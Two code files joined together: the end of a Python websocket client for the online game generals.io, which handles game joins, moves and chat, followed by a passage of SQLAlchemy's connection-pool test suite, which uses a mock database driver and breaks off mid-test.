_spawn(self._start_sending_heartbeat)
logging.debug("Joining game")
self._send(["star_and_rank", userid])
self._send(["set_username", userid, username])
if mode == "private":
if gameid is None:
raise ValueError("Gameid must be provided for private games")
self._send(["join_private", gameid, username, userid])
elif mode == "1v1":
self._send(["join_1v1", username, userid])
elif mode == "team":
self._send(["join_team", username, userid])
elif mode == "ffa":
self._send(["play", username, userid])
else:
raise ValueError("Invalid mode")
self._send(["set_force_start", gameid, force_start])
self._seen_update = False
self._move_id = 1
self._start_data = {}
self._stars = []
self._map = []
self._cities = []
def send_chat(self, msg):
# 42["chat_message", "game_148479560460049JgP8O3TPIwDNpgAEBB", "ship", null, ""]
if not self._seen_update:
raise ValueError("Cannot chat before game starts")
if len(msg) < 2:
return
self._send(["chat_message", self._start_data['chat_room'], msg, None, ""])
def move(self, y1, x1, y2, x2, move_half=False):
if not self._seen_update:
raise ValueError("Cannot move before first map seen")
cols = self._map.cols
a = y1 * cols + x1
b = y2 * cols + x2
self._send(["attack", a, b, move_half, self._move_id])
self._move_id += 1
def get_updates(self):
while True:
try:
msg = self._ws.recv()
except WebSocketConnectionClosedException:
break
if not msg.strip():
break
# ignore heartbeats and connection acks
if msg in {"3", "40"}:
continue
# remove numeric prefix
while msg and msg[0].isdigit():
msg = msg[1:]
msg = json.loads(msg)
if not isinstance(msg, list):
continue
if msg[0] == "error_user_id":
raise ValueError("Already in game")
elif msg[0] == "game_start":
logging.info("Game info: {}".format(msg[1]))
self._start_data = msg[1]
elif msg[0] == "game_update":
yield self._make_update(msg[1])
elif msg[0] in ["game_won", "game_lost"]:
yield self._make_result(msg[0], msg[1])
break
elif msg[0] == "chat_message":
chat_msg = msg[2]
if "username" in chat_msg:
print("From %s: %s" % (chat_msg["username"],chat_msg["text"]))
else:
print("Message: %s" % chat_msg["text"])
else:
logging.info("Unknown message type: {}".format(msg))
def close(self):
self._ws.close()
def _make_update(self, data):
if not self._seen_update:
self._seen_update = True
self._map = map.Map(self._start_data, data)
return self._map
return self._map.update(data)
def _make_result(self, update, data):
return self._map.updateResult(update)
def _start_sending_heartbeat(self):
while True:
try:
with self._lock:
self._ws.send("2")
except WebSocketConnectionClosedException:
break
time.sleep(0.1)
def _send(self, msg):
try:
with self._lock:
self._ws.send("42" + json.dumps(msg))
except WebSocketConnectionClosedException:
pass
def _spawn(f):
t = threading.Thread(target=f)
t.daemon = True
t.start()
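# Minimal sketch (not part of the client) of the socket.io framing handled in
# get_updates above: frames arrive as a numeric packet-type prefix followed by
# a JSON array, e.g. '42["game_update", {...}]'.
def _parse_socketio_frame(raw):
    while raw and raw[0].isdigit():
        raw = raw[1:]
    return json.loads(raw) if raw else None
# Example: _parse_socketio_frame('42["game_start", {"playerIndex": 0}]')
# returns ['game_start', {'playerIndex': 0}].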
|
test_pool.py
|
import threading
import time
from sqlalchemy import pool, select, event
import sqlalchemy as tsa
from sqlalchemy import testing
from sqlalchemy.testing.util import gc_collect, lazy_gc
from sqlalchemy.testing import eq_, assert_raises, is_not_, is_
from sqlalchemy.testing.engines import testing_engine
from sqlalchemy.testing import fixtures
import random
from sqlalchemy.testing.mock import Mock, call, patch, ANY
import weakref
import collections
join_timeout = 10
def MockDBAPI(): # noqa
def cursor():
return Mock()
def connect(*arg, **kw):
return Mock(cursor=Mock(side_effect=cursor))
def shutdown(value):
if value:
db.connect = Mock(side_effect=Exception("connect failed"))
else:
db.connect = Mock(side_effect=connect)
db.is_shutdown = value
db = Mock(
connect=Mock(side_effect=connect),
shutdown=shutdown,
is_shutdown=False)
return db
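# Illustrative sketch (not part of the test suite): how the MockDBAPI fixture
# above is typically wired into a QueuePool, mirroring _queuepool_dbapi_fixture
# below.
def _mock_queuepool_sketch():
    dbapi = MockDBAPI()
    p = pool.QueuePool(creator=lambda: dbapi.connect('foo.db'),
                       pool_size=1, max_overflow=0)
    conn = p.connect()
    conn.close()
    return dbapi.connect.mock_calls  # [call('foo.db')]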
class PoolTestBase(fixtures.TestBase):
def setup(self):
pool.clear_managers()
self._teardown_conns = []
def teardown(self):
for ref in self._teardown_conns:
conn = ref()
if conn:
conn.close()
@classmethod
def teardown_class(cls):
pool.clear_managers()
def _with_teardown(self, connection):
self._teardown_conns.append(weakref.ref(connection))
return connection
def _queuepool_fixture(self, **kw):
dbapi, pool = self._queuepool_dbapi_fixture(**kw)
return pool
def _queuepool_dbapi_fixture(self, **kw):
dbapi = MockDBAPI()
return dbapi, pool.QueuePool(
creator=lambda: dbapi.connect('foo.db'),
**kw)
class PoolTest(PoolTestBase):
def test_manager(self):
manager = pool.manage(MockDBAPI(), use_threadlocal=True)
c1 = manager.connect('foo.db')
c2 = manager.connect('foo.db')
c3 = manager.connect('bar.db')
c4 = manager.connect("foo.db", bar="bat")
c5 = manager.connect("foo.db", bar="hoho")
c6 = manager.connect("foo.db", bar="bat")
assert c1.cursor() is not None
assert c1 is c2
assert c1 is not c3
assert c4 is c6
assert c4 is not c5
def test_manager_with_key(self):
dbapi = MockDBAPI()
manager = pool.manage(dbapi, use_threadlocal=True)
c1 = manager.connect('foo.db', sa_pool_key="a")
c2 = manager.connect('foo.db', sa_pool_key="b")
c3 = manager.connect('bar.db', sa_pool_key="a")
assert c1.cursor() is not None
assert c1 is not c2
assert c1 is c3
eq_(
dbapi.connect.mock_calls,
[
call("foo.db"),
call("foo.db"),
]
)
def test_bad_args(self):
manager = pool.manage(MockDBAPI())
manager.connect(None)
def test_non_thread_local_manager(self):
manager = pool.manage(MockDBAPI(), use_threadlocal=False)
connection = manager.connect('foo.db')
connection2 = manager.connect('foo.db')
self.assert_(connection.cursor() is not None)
self.assert_(connection is not connection2)
@testing.fails_on('+pyodbc',
"pyodbc cursor doesn't implement tuple __eq__")
@testing.fails_on("+pg8000", "returns [1], not (1,)")
def test_cursor_iterable(self):
conn = testing.db.raw_connection()
cursor = conn.cursor()
cursor.execute(str(select([1], bind=testing.db)))
expected = [(1, )]
for row in cursor:
eq_(row, expected.pop(0))
def test_no_connect_on_recreate(self):
def creator():
raise Exception("no creates allowed")
for cls in (pool.SingletonThreadPool, pool.StaticPool,
pool.QueuePool, pool.NullPool, pool.AssertionPool):
p = cls(creator=creator)
p.dispose()
p2 = p.recreate()
assert p2.__class__ is cls
mock_dbapi = MockDBAPI()
p = cls(creator=mock_dbapi.connect)
conn = p.connect()
conn.close()
mock_dbapi.connect.side_effect = Exception("error!")
p.dispose()
p.recreate()
def test_threadlocal_del(self):
self._do_testthreadlocal(useclose=False)
def test_threadlocal_close(self):
self._do_testthreadlocal(useclose=True)
def _do_testthreadlocal(self, useclose=False):
dbapi = MockDBAPI()
for p in pool.QueuePool(creator=dbapi.connect,
pool_size=3, max_overflow=-1,
use_threadlocal=True), \
pool.SingletonThreadPool(
creator=dbapi.connect,
use_threadlocal=True):
c1 = p.connect()
c2 = p.connect()
self.assert_(c1 is c2)
c3 = p.unique_connection()
self.assert_(c3 is not c1)
if useclose:
c2.close()
else:
c2 = None
c2 = p.connect()
self.assert_(c1 is c2)
self.assert_(c3 is not c1)
if useclose:
c2.close()
else:
c2 = None
lazy_gc()
if useclose:
c1 = p.connect()
c2 = p.connect()
c3 = p.connect()
c3.close()
c2.close()
self.assert_(c1.connection is not None)
c1.close()
c1 = c2 = c3 = None
# extra tests with QueuePool to ensure connections get
# __del__()ed when dereferenced
if isinstance(p, pool.QueuePool):
lazy_gc()
self.assert_(p.checkedout() == 0)
c1 = p.connect()
c2 = p.connect()
if useclose:
c2.close()
c1.close()
else:
c2 = None
c1 = None
lazy_gc()
self.assert_(p.checkedout() == 0)
def test_info(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0)
c = p.connect()
self.assert_(not c.info)
self.assert_(c.info is c._connection_record.info)
c.info['foo'] = 'bar'
c.close()
del c
c = p.connect()
self.assert_('foo' in c.info)
c.invalidate()
c = p.connect()
self.assert_('foo' not in c.info)
c.info['foo2'] = 'bar2'
c.detach()
self.assert_('foo2' in c.info)
c2 = p.connect()
is_not_(c.connection, c2.connection)
assert not c2.info
assert 'foo2' in c.info
def test_rec_info(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0)
c = p.connect()
self.assert_(not c.record_info)
self.assert_(c.record_info is c._connection_record.record_info)
c.record_info['foo'] = 'bar'
c.close()
del c
c = p.connect()
self.assert_('foo' in c.record_info)
c.invalidate()
c = p.connect()
self.assert_('foo' in c.record_info)
c.record_info['foo2'] = 'bar2'
c.detach()
is_(c.record_info, None)
is_(c._connection_record, None)
c2 = p.connect()
assert c2.record_info
assert 'foo2' in c2.record_info
def test_rec_unconnected(self):
# test production of a _ConnectionRecord with an
# initially unconnected state.
dbapi = MockDBAPI()
p1 = pool.Pool(
creator=lambda: dbapi.connect('foo.db')
)
r1 = pool._ConnectionRecord(p1, connect=False)
assert not r1.connection
c1 = r1.get_connection()
is_(c1, r1.connection)
def test_rec_close_reopen(self):
# test that _ConnectionRecord.close() allows
# the record to be reusable
dbapi = MockDBAPI()
p1 = pool.Pool(
creator=lambda: dbapi.connect('foo.db')
)
r1 = pool._ConnectionRecord(p1)
c1 = r1.connection
c2 = r1.get_connection()
is_(c1, c2)
r1.close()
assert not r1.connection
eq_(
c1.mock_calls,
[call.close()]
)
c2 = r1.get_connection()
is_not_(c1, c2)
is_(c2, r1.connection)
eq_(
c2.mock_calls,
[]
)
class PoolDialectTest(PoolTestBase):
def _dialect(self):
canary = []
class PoolDialect(object):
def do_rollback(self, dbapi_connection):
canary.append('R')
dbapi_connection.rollback()
def do_commit(self, dbapi_connection):
canary.append('C')
dbapi_connection.commit()
def do_close(self, dbapi_connection):
canary.append('CL')
dbapi_connection.close()
return PoolDialect(), canary
def _do_test(self, pool_cls, assertion):
mock_dbapi = MockDBAPI()
dialect, canary = self._dialect()
p = pool_cls(creator=mock_dbapi.connect)
p._dialect = dialect
conn = p.connect()
conn.close()
p.dispose()
p.recreate()
conn = p.connect()
conn.close()
eq_(canary, assertion)
def test_queue_pool(self):
self._do_test(pool.QueuePool, ['R', 'CL', 'R'])
def test_assertion_pool(self):
self._do_test(pool.AssertionPool, ['R', 'CL', 'R'])
def test_singleton_pool(self):
self._do_test(pool.SingletonThreadPool, ['R', 'CL', 'R'])
def test_null_pool(self):
self._do_test(pool.NullPool, ['R', 'CL', 'R', 'CL'])
def test_static_pool(self):
self._do_test(pool.StaticPool, ['R', 'R'])
class PoolEventsTest(PoolTestBase):
def _first_connect_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def first_connect(*arg, **kw):
canary.append('first_connect')
event.listen(p, 'first_connect', first_connect)
return p, canary
def _connect_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def connect(*arg, **kw):
canary.append('connect')
event.listen(p, 'connect', connect)
return p, canary
def _checkout_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def checkout(*arg, **kw):
canary.append('checkout')
event.listen(p, 'checkout', checkout)
return p, canary
def _checkin_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def checkin(*arg, **kw):
canary.append('checkin')
event.listen(p, 'checkin', checkin)
return p, canary
def _reset_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def reset(*arg, **kw):
canary.append('reset')
event.listen(p, 'reset', reset)
return p, canary
def _invalidate_event_fixture(self):
p = self._queuepool_fixture()
canary = Mock()
event.listen(p, 'invalidate', canary)
return p, canary
def _soft_invalidate_event_fixture(self):
p = self._queuepool_fixture()
canary = Mock()
event.listen(p, 'soft_invalidate', canary)
return p, canary
def _close_event_fixture(self):
p = self._queuepool_fixture()
canary = Mock()
event.listen(p, 'close', canary)
return p, canary
def _detach_event_fixture(self):
p = self._queuepool_fixture()
canary = Mock()
event.listen(p, 'detach', canary)
return p, canary
def _close_detached_event_fixture(self):
p = self._queuepool_fixture()
canary = Mock()
event.listen(p, 'close_detached', canary)
return p, canary
def test_close(self):
p, canary = self._close_event_fixture()
c1 = p.connect()
connection = c1.connection
rec = c1._connection_record
c1.close()
eq_(canary.mock_calls, [])
p.dispose()
eq_(canary.mock_calls, [call(connection, rec)])
def test_detach(self):
p, canary = self._detach_event_fixture()
c1 = p.connect()
connection = c1.connection
rec = c1._connection_record
c1.detach()
eq_(canary.mock_calls, [call(connection, rec)])
def test_detach_close(self):
p, canary = self._close_detached_event_fixture()
c1 = p.connect()
connection = c1.connection
c1.detach()
c1.close()
eq_(canary.mock_calls, [call(connection)])
def test_first_connect_event(self):
p, canary = self._first_connect_event_fixture()
p.connect()
eq_(canary, ['first_connect'])
def test_first_connect_event_fires_once(self):
p, canary = self._first_connect_event_fixture()
p.connect()
p.connect()
eq_(canary, ['first_connect'])
def test_first_connect_on_previously_recreated(self):
p, canary = self._first_connect_event_fixture()
p2 = p.recreate()
p.connect()
p2.connect()
eq_(canary, ['first_connect', 'first_connect'])
def test_first_connect_on_subsequently_recreated(self):
p, canary = self._first_connect_event_fixture()
p.connect()
p2 = p.recreate()
p2.connect()
eq_(canary, ['first_connect', 'first_connect'])
def test_connect_event(self):
p, canary = self._connect_event_fixture()
p.connect()
eq_(canary, ['connect'])
def test_connect_event_fires_subsequent(self):
p, canary = self._connect_event_fixture()
c1 = p.connect() # noqa
c2 = p.connect() # noqa
eq_(canary, ['connect', 'connect'])
def test_connect_on_previously_recreated(self):
p, canary = self._connect_event_fixture()
p2 = p.recreate()
p.connect()
p2.connect()
eq_(canary, ['connect', 'connect'])
def test_connect_on_subsequently_recreated(self):
p, canary = self._connect_event_fixture()
p.connect()
p2 = p.recreate()
p2.connect()
eq_(canary, ['connect', 'connect'])
def test_checkout_event(self):
p, canary = self._checkout_event_fixture()
p.connect()
eq_(canary, ['checkout'])
def test_checkout_event_fires_subsequent(self):
p, canary = self._checkout_event_fixture()
p.connect()
p.connect()
eq_(canary, ['checkout', 'checkout'])
def test_checkout_event_on_subsequently_recreated(self):
p, canary = self._checkout_event_fixture()
p.connect()
p2 = p.recreate()
p2.connect()
eq_(canary, ['checkout', 'checkout'])
def test_checkin_event(self):
p, canary = self._checkin_event_fixture()
c1 = p.connect()
eq_(canary, [])
c1.close()
eq_(canary, ['checkin'])
def test_reset_event(self):
p, canary = self._reset_event_fixture()
c1 = p.connect()
eq_(canary, [])
c1.close()
eq_(canary, ['reset'])
def test_soft_invalidate_event_no_exception(self):
p, canary = self._soft_invalidate_event_fixture()
c1 = p.connect()
c1.close()
assert not canary.called
c1 = p.connect()
dbapi_con = c1.connection
c1.invalidate(soft=True)
assert canary.call_args_list[0][0][0] is dbapi_con
assert canary.call_args_list[0][0][2] is None
def test_soft_invalidate_event_exception(self):
p, canary = self._soft_invalidate_event_fixture()
c1 = p.connect()
c1.close()
assert not canary.called
c1 = p.connect()
dbapi_con = c1.connection
exc = Exception("hi")
c1.invalidate(exc, soft=True)
assert canary.call_args_list[0][0][0] is dbapi_con
assert canary.call_args_list[0][0][2] is exc
def test_invalidate_event_no_exception(self):
p, canary = self._invalidate_event_fixture()
c1 = p.connect()
c1.close()
assert not canary.called
c1 = p.connect()
dbapi_con = c1.connection
c1.invalidate()
assert canary.call_args_list[0][0][0] is dbapi_con
assert canary.call_args_list[0][0][2] is None
def test_invalidate_event_exception(self):
p, canary = self._invalidate_event_fixture()
c1 = p.connect()
c1.close()
assert not canary.called
c1 = p.connect()
dbapi_con = c1.connection
exc = Exception("hi")
c1.invalidate(exc)
assert canary.call_args_list[0][0][0] is dbapi_con
assert canary.call_args_list[0][0][2] is exc
def test_checkin_event_gc(self):
p, canary = self._checkin_event_fixture()
c1 = p.connect()
eq_(canary, [])
del c1
lazy_gc()
eq_(canary, ['checkin'])
def test_checkin_event_on_subsequently_recreated(self):
p, canary = self._checkin_event_fixture()
c1 = p.connect()
p2 = p.recreate()
c2 = p2.connect()
eq_(canary, [])
c1.close()
eq_(canary, ['checkin'])
c2.close()
eq_(canary, ['checkin', 'checkin'])
def test_listen_targets_scope(self):
canary = []
def listen_one(*args):
canary.append("listen_one")
def listen_two(*args):
canary.append("listen_two")
def listen_three(*args):
canary.append("listen_three")
def listen_four(*args):
canary.append("listen_four")
engine = testing_engine(testing.db.url)
event.listen(pool.Pool, 'connect', listen_one)
event.listen(engine.pool, 'connect', listen_two)
event.listen(engine, 'connect', listen_three)
event.listen(engine.__class__, 'connect', listen_four)
engine.execute(select([1])).close()
eq_(
canary,
["listen_one", "listen_four", "listen_two", "listen_three"]
)
def test_listen_targets_per_subclass(self):
"""test that listen() called on a subclass remains specific to
that subclass."""
canary = []
def listen_one(*args):
canary.append("listen_one")
def listen_two(*args):
canary.append("listen_two")
def listen_three(*args):
canary.append("listen_three")
event.listen(pool.Pool, 'connect', listen_one)
event.listen(pool.QueuePool, 'connect', listen_two)
event.listen(pool.SingletonThreadPool, 'connect', listen_three)
p1 = pool.QueuePool(creator=MockDBAPI().connect)
p2 = pool.SingletonThreadPool(creator=MockDBAPI().connect)
assert listen_one in p1.dispatch.connect
assert listen_two in p1.dispatch.connect
assert listen_three not in p1.dispatch.connect
assert listen_one in p2.dispatch.connect
assert listen_two not in p2.dispatch.connect
assert listen_three in p2.dispatch.connect
p1.connect()
eq_(canary, ["listen_one", "listen_two"])
p2.connect()
eq_(canary, ["listen_one", "listen_two", "listen_one", "listen_three"])
def teardown(self):
# TODO: need to get remove() functionality
# going
pool.Pool.dispatch._clear()
class PoolFirstConnectSyncTest(PoolTestBase):
# test [ticket:2964]
@testing.requires.timing_intensive
def test_sync(self):
pool = self._queuepool_fixture(pool_size=3, max_overflow=0)
evt = Mock()
@event.listens_for(pool, 'first_connect')
def slow_first_connect(dbapi_con, rec):
time.sleep(1)
evt.first_connect()
@event.listens_for(pool, 'connect')
def on_connect(dbapi_con, rec):
evt.connect()
def checkout():
for j in range(2):
c1 = pool.connect()
time.sleep(.02)
c1.close()
time.sleep(.02)
threads = []
for i in range(5):
th = threading.Thread(target=checkout)
th.start()
threads.append(th)
for th in threads:
th.join(join_timeout)
eq_(
evt.mock_calls,
[
call.first_connect(),
call.connect(),
call.connect(),
call.connect()]
)
class DeprecatedPoolListenerTest(PoolTestBase):
@testing.requires.predictable_gc
@testing.uses_deprecated(r".*Use event.listen")
def test_listeners(self):
class InstrumentingListener(object):
def __init__(self):
if hasattr(self, 'connect'):
self.connect = self.inst_connect
if hasattr(self, 'first_connect'):
self.first_connect = self.inst_first_connect
if hasattr(self, 'checkout'):
self.checkout = self.inst_checkout
if hasattr(self, 'checkin'):
self.checkin = self.inst_checkin
self.clear()
def clear(self):
self.connected = []
self.first_connected = []
self.checked_out = []
self.checked_in = []
def assert_total(self, conn, fconn, cout, cin):
eq_(len(self.connected), conn)
eq_(len(self.first_connected), fconn)
eq_(len(self.checked_out), cout)
eq_(len(self.checked_in), cin)
def assert_in(
self, item, in_conn, in_fconn,
in_cout, in_cin):
eq_((item in self.connected), in_conn)
eq_((item in self.first_connected), in_fconn)
eq_((item in self.checked_out), in_cout)
eq_((item in self.checked_in), in_cin)
def inst_connect(self, con, record):
print("connect(%s, %s)" % (con, record))
assert con is not None
assert record is not None
self.connected.append(con)
def inst_first_connect(self, con, record):
print("first_connect(%s, %s)" % (con, record))
assert con is not None
assert record is not None
self.first_connected.append(con)
def inst_checkout(self, con, record, proxy):
print("checkout(%s, %s, %s)" % (con, record, proxy))
assert con is not None
assert record is not None
assert proxy is not None
self.checked_out.append(con)
def inst_checkin(self, con, record):
print("checkin(%s, %s)" % (con, record))
# con can be None if invalidated
assert record is not None
self.checked_in.append(con)
class ListenAll(tsa.interfaces.PoolListener, InstrumentingListener):
pass
class ListenConnect(InstrumentingListener):
def connect(self, con, record):
pass
class ListenFirstConnect(InstrumentingListener):
def first_connect(self, con, record):
pass
class ListenCheckOut(InstrumentingListener):
def checkout(self, con, record, proxy, num):
pass
class ListenCheckIn(InstrumentingListener):
def checkin(self, con, record):
pass
def assert_listeners(p, total, conn, fconn, cout, cin):
for instance in (p, p.recreate()):
self.assert_(len(instance.dispatch.connect) == conn)
self.assert_(len(instance.dispatch.first_connect) == fconn)
self.assert_(len(instance.dispatch.checkout) == cout)
self.assert_(len(instance.dispatch.checkin) == cin)
p = self._queuepool_fixture()
assert_listeners(p, 0, 0, 0, 0, 0)
p.add_listener(ListenAll())
assert_listeners(p, 1, 1, 1, 1, 1)
p.add_listener(ListenConnect())
assert_listeners(p, 2, 2, 1, 1, 1)
p.add_listener(ListenFirstConnect())
assert_listeners(p, 3, 2, 2, 1, 1)
p.add_listener(ListenCheckOut())
assert_listeners(p, 4, 2, 2, 2, 1)
p.add_listener(ListenCheckIn())
assert_listeners(p, 5, 2, 2, 2, 2)
del p
snoop = ListenAll()
p = self._queuepool_fixture(listeners=[snoop])
assert_listeners(p, 1, 1, 1, 1, 1)
c = p.connect()
snoop.assert_total(1, 1, 1, 0)
cc = c.connection
snoop.assert_in(cc, True, True, True, False)
c.close()
snoop.assert_in(cc, True, True, True, True)
del c, cc
snoop.clear()
# this one depends on immediate gc
c = p.connect()
cc = c.connection
snoop.assert_in(cc, False, False, True, False)
snoop.assert_total(0, 0, 1, 0)
del c, cc
lazy_gc()
snoop.assert_total(0, 0, 1, 1)
p.dispose()
snoop.clear()
c = p.connect()
c.close()
c = p.connect()
snoop.assert_total(1, 0, 2, 1)
c.close()
snoop.assert_total(1, 0, 2, 2)
# invalidation
p.dispose()
snoop.clear()
c = p.connect()
snoop.assert_total(1, 0, 1, 0)
c.invalidate()
snoop.assert_total(1, 0, 1, 1)
c.close()
snoop.assert_total(1, 0, 1, 1)
del c
lazy_gc()
snoop.assert_total(1, 0, 1, 1)
c = p.connect()
snoop.assert_total(2, 0, 2, 1)
c.close()
del c
lazy_gc()
snoop.assert_total(2, 0, 2, 2)
# detached
p.dispose()
snoop.clear()
c = p.connect()
snoop.assert_total(1, 0, 1, 0)
c.detach()
snoop.assert_total(1, 0, 1, 0)
c.close()
del c
snoop.assert_total(1, 0, 1, 0)
c = p.connect()
snoop.assert_total(2, 0, 2, 0)
c.close()
del c
snoop.assert_total(2, 0, 2, 1)
# recreated
p = p.recreate()
snoop.clear()
c = p.connect()
snoop.assert_total(1, 1, 1, 0)
c.close()
snoop.assert_total(1, 1, 1, 1)
c = p.connect()
snoop.assert_total(1, 1, 2, 1)
c.close()
snoop.assert_total(1, 1, 2, 2)
@testing.uses_deprecated(r".*Use event.listen")
def test_listeners_callables(self):
def connect(dbapi_con, con_record):
counts[0] += 1
def checkout(dbapi_con, con_record, con_proxy):
counts[1] += 1
def checkin(dbapi_con, con_record):
counts[2] += 1
i_all = dict(connect=connect, checkout=checkout, checkin=checkin)
i_connect = dict(connect=connect)
i_checkout = dict(checkout=checkout)
i_checkin = dict(checkin=checkin)
for cls in (pool.QueuePool, pool.StaticPool):
counts = [0, 0, 0]
def assert_listeners(p, total, conn, cout, cin):
for instance in (p, p.recreate()):
eq_(len(instance.dispatch.connect), conn)
eq_(len(instance.dispatch.checkout), cout)
eq_(len(instance.dispatch.checkin), cin)
p = self._queuepool_fixture()
assert_listeners(p, 0, 0, 0, 0)
p.add_listener(i_all)
assert_listeners(p, 1, 1, 1, 1)
p.add_listener(i_connect)
assert_listeners(p, 2, 1, 1, 1)
p.add_listener(i_checkout)
assert_listeners(p, 3, 1, 1, 1)
p.add_listener(i_checkin)
assert_listeners(p, 4, 1, 1, 1)
del p
p = self._queuepool_fixture(listeners=[i_all])
assert_listeners(p, 1, 1, 1, 1)
c = p.connect()
assert counts == [1, 1, 0]
c.close()
assert counts == [1, 1, 1]
c = p.connect()
assert counts == [1, 2, 1]
p.add_listener(i_checkin)
c.close()
assert counts == [1, 2, 2]
class QueuePoolTest(PoolTestBase):
def test_queuepool_del(self):
self._do_testqueuepool(useclose=False)
def test_queuepool_close(self):
self._do_testqueuepool(useclose=True)
def _do_testqueuepool(self, useclose=False):
p = self._queuepool_fixture(
pool_size=3,
max_overflow=-1)
def status(pool):
return pool.size(), pool.checkedin(), pool.overflow(), \
pool.checkedout()
c1 = p.connect()
self.assert_(status(p) == (3, 0, -2, 1))
c2 = p.connect()
self.assert_(status(p) == (3, 0, -1, 2))
c3 = p.connect()
self.assert_(status(p) == (3, 0, 0, 3))
c4 = p.connect()
self.assert_(status(p) == (3, 0, 1, 4))
c5 = p.connect()
self.assert_(status(p) == (3, 0, 2, 5))
c6 = p.connect()
self.assert_(status(p) == (3, 0, 3, 6))
if useclose:
c4.close()
c3.close()
c2.close()
else:
c4 = c3 = c2 = None
lazy_gc()
self.assert_(status(p) == (3, 3, 3, 3))
if useclose:
c1.close()
c5.close()
c6.close()
else:
c1 = c5 = c6 = None
lazy_gc()
self.assert_(status(p) == (3, 3, 0, 0))
c1 = p.connect()
c2 = p.connect()
self.assert_(status(p) == (3, 1, 0, 2), status(p))
if useclose:
c2.close()
else:
c2 = None
lazy_gc()
self.assert_(status(p) == (3, 2, 0, 1))
c1.close()
lazy_gc()
assert not pool._refs
@testing.requires.timing_intensive
def test_timeout(self):
p = self._queuepool_fixture(
pool_size=3,
max_overflow=0,
timeout=2)
c1 = p.connect() # noqa
c2 = p.connect() # noqa
c3 = p.connect() # noqa
now = time.time()
assert_raises(
tsa.exc.TimeoutError,
p.connect
)
assert int(time.time() - now) == 2
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_timeout_race(self):
# test a race condition where the initial connecting threads all race
# to queue.Empty, then block on the mutex. each thread consumes a
# connection as they go in. when the limit is reached, the remaining
# threads go in, and get TimeoutError; even though they never got to
# wait for the timeout on queue.get(). the fix involves checking the
# timeout again within the mutex, and if so, unlocking and throwing
# them back to the start of do_get()
dbapi = MockDBAPI()
p = pool.QueuePool(
creator=lambda: dbapi.connect(delay=.05),
pool_size=2,
max_overflow=1, use_threadlocal=False, timeout=3)
timeouts = []
def checkout():
for x in range(1):
now = time.time()
try:
c1 = p.connect()
except tsa.exc.TimeoutError:
timeouts.append(time.time() - now)
continue
time.sleep(4)
c1.close()
threads = []
for i in range(10):
th = threading.Thread(target=checkout)
th.start()
threads.append(th)
for th in threads:
th.join(join_timeout)
assert len(timeouts) > 0
for t in timeouts:
assert t >= 3, "Not all timeouts were >= 3 seconds %r" % timeouts
# normally, the timeout should be under 4 seconds,
# but on a loaded down buildbot it can go up.
assert t < 14, "Not all timeouts were < 14 seconds %r" % timeouts
def _test_overflow(self, thread_count, max_overflow):
gc_collect()
dbapi = MockDBAPI()
mutex = threading.Lock()
def creator():
time.sleep(.05)
with mutex:
return dbapi.connect()
p = pool.QueuePool(creator=creator,
pool_size=3, timeout=2,
max_overflow=max_overflow)
peaks = []
def whammy():
for i in range(10):
try:
con = p.connect()
time.sleep(.005)
peaks.append(p.overflow())
con.close()
del con
except tsa.exc.TimeoutError:
pass
threads = []
for i in range(thread_count):
th = threading.Thread(target=whammy)
th.start()
threads.append(th)
for th in threads:
th.join(join_timeout)
self.assert_(max(peaks) <= max_overflow)
lazy_gc()
assert not pool._refs
def test_overflow_reset_on_failed_connect(self):
dbapi = Mock()
def failing_dbapi():
time.sleep(2)
raise Exception("connection failed")
creator = dbapi.connect
def create():
return creator()
p = pool.QueuePool(creator=create, pool_size=2, max_overflow=3)
c1 = self._with_teardown(p.connect()) # noqa
c2 = self._with_teardown(p.connect()) # noqa
c3 = self._with_teardown(p.connect()) # noqa
eq_(p._overflow, 1)
creator = failing_dbapi
assert_raises(Exception, p.connect)
eq_(p._overflow, 1)
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_hanging_connect_within_overflow(self):
"""test that a single connect() call which is hanging
does not block other connections from proceeding."""
dbapi = Mock()
mutex = threading.Lock()
def hanging_dbapi():
time.sleep(2)
with mutex:
return dbapi.connect()
def fast_dbapi():
with mutex:
return dbapi.connect()
creator = threading.local()
def create():
return creator.mock_connector()
def run_test(name, pool, should_hang):
if should_hang:
creator.mock_connector = hanging_dbapi
else:
creator.mock_connector = fast_dbapi
conn = pool.connect()
conn.operation(name)
time.sleep(1)
conn.close()
p = pool.QueuePool(creator=create, pool_size=2, max_overflow=3)
threads = [
threading.Thread(
target=run_test, args=("success_one", p, False)),
threading.Thread(
target=run_test, args=("success_two", p, False)),
threading.Thread(
target=run_test, args=("overflow_one", p, True)),
threading.Thread(
target=run_test, args=("overflow_two", p, False)),
threading.Thread(
target=run_test, args=("overflow_three", p, False))
]
for t in threads:
t.start()
time.sleep(.2)
for t in threads:
t.join(timeout=join_timeout)
eq_(
dbapi.connect().operation.mock_calls,
[call("success_one"), call("success_two"),
call("overflow_two"), call("overflow_three"),
call("overflow_one")]
)
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_waiters_handled(self):
"""test that threads waiting for connections are
handled when the pool is replaced.
"""
mutex = threading.Lock()
dbapi = MockDBAPI()
def creator():
mutex.acquire()
try:
return dbapi.connect()
finally:
mutex.release()
success = []
for timeout in (None, 30):
for max_overflow in (0, -1, 3):
p = pool.QueuePool(creator=creator,
pool_size=2, timeout=timeout,
max_overflow=max_overflow)
def waiter(p, timeout, max_overflow):
success_key = (timeout, max_overflow)
conn = p.connect()
success.append(success_key)
time.sleep(.1)
conn.close()
c1 = p.connect() # noqa
c2 = p.connect()
threads = []
for i in range(2):
t = threading.Thread(
target=waiter,
args=(p, timeout, max_overflow))
t.daemon = True
t.start()
threads.append(t)
# this sleep makes sure that the
# two waiter threads hit upon wait()
# inside the queue, before we invalidate the other
# two conns
time.sleep(.2)
p._invalidate(c2)
for t in threads:
t.join(join_timeout)
eq_(len(success), 12, "successes: %s" % success)
def test_connrec_invalidated_within_checkout_no_race(self):
"""Test that a concurrent ConnectionRecord.invalidate() which
occurs after the ConnectionFairy has called
_ConnectionRecord.checkout()
but before the ConnectionFairy tests "fairy.connection is None"
will not result in an InvalidRequestError.
This use case assumes that a listener on the checkout() event
will be raising DisconnectionError so that a reconnect attempt
may occur.
"""
dbapi = MockDBAPI()
